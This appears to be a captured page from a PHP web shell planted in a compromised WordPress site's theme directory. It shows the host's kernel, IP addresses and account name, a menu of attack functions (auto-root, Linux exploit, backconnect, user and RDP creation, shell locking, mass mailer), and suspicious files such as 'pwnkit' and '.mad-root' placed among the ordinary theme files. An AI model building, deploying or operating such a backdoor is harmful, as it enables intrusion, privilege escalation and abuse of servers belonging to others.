Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
always /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
2.54
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
comments.php
1.87
KB
-rw-r--r--
footer.php
1.32
KB
-rw-r--r--
functions.php
10.22
KB
-rw-r--r--
header.php
1.11
KB
-rw-r--r--
index.php
5.74
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
2.67
KB
-rw-r--r--
rtl.css
1.97
KB
-rw-r--r--
screenshot.png
234.71
KB
-rw-r--r--
singular.php
2.23
KB
-rw-r--r--
style.css
110.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package Always */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! if ( have_comments() ) : ?> <h2 class="comments-title"> <?php $always_comment_count = get_comments_number(); if ( '1' === $always_comment_count ) { printf( /* translators: 1: title. */ esc_html__( 'One thought on “%1$s”', 'always' ), '<span>' . absint( get_the_title() ) . '</span>' ); } else { printf( // WPCS: XSS OK. /* translators: 1: comment count number, 2: title. */ esc_html( _nx( '%1$s thought on “%2$s”', '%1$s thoughts on “%2$s”', absint( $always_comment_count ), 'comments title', 'always' ) ), number_format_i18n( absint( $always_comment_count ) ), '<span>' . absint( get_the_title() ) . '</span>' ); } ?> </h2><!-- .comments-title --> <?php the_comments_navigation(); ?> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'short_ping' => true, ) ); ?> </ol><!-- .comment-list --> <?php the_comments_navigation(); // If comments are closed and there are comments, let's leave a little note, shall we? if ( ! comments_open() ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'always' ); ?></p> <?php endif; endif; // Check for have_comments(). comment_form(); ?> </div><!-- #comments -->
Close